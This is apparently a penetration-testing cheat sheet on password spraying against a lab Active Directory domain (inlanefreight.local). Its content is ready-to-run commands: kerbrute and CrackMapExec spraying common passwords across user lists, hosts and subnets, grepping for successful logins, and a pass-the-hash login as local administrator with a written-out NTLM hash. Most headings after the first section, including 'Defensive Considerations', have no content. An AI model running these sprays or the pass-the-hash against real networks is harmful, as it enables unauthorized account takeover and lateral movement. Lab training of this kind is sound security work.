Password Spraying - Windows
Password Spraying - Windows
Internal Password Spraying - from Linux
Using Kerbrute for Password Spraying
# Basic password spray against a domain
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
# With delay between attempts
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 -t 1 --delay 5 valid_users.txt Welcome1
# Specify specific domain controller
kerbrute passwordspray -d inlanefreight.local --dc dc01.inlanefreight.local valid_users.txt Welcome1Using CrackMapExec (CME)
# Basic SMB password spray
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123
# Filter successful logins
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
# Test against specific domain
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 -d INLANEFREIGHT.LOCAL
# Test against subnet
sudo crackmapexec smb 172.16.5.0/24 -u valid_users.txt -p Password123
# Using local authentication
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +Validating Credentials with CrackMapExec
Internal Password Spraying - from Windows
Using DomainPasswordSpray.ps1
Using Rubeus
Enumeration with Valid Credentials
Domain User Enumeration with CME
Domain Group Enumeration with CME
Session and Logged On User Enumeration
Share Enumeration
Password Spraying Strategy
Determining Lockout Policy
Building Target User Lists
Batch Processing
Defensive Considerations
Last updated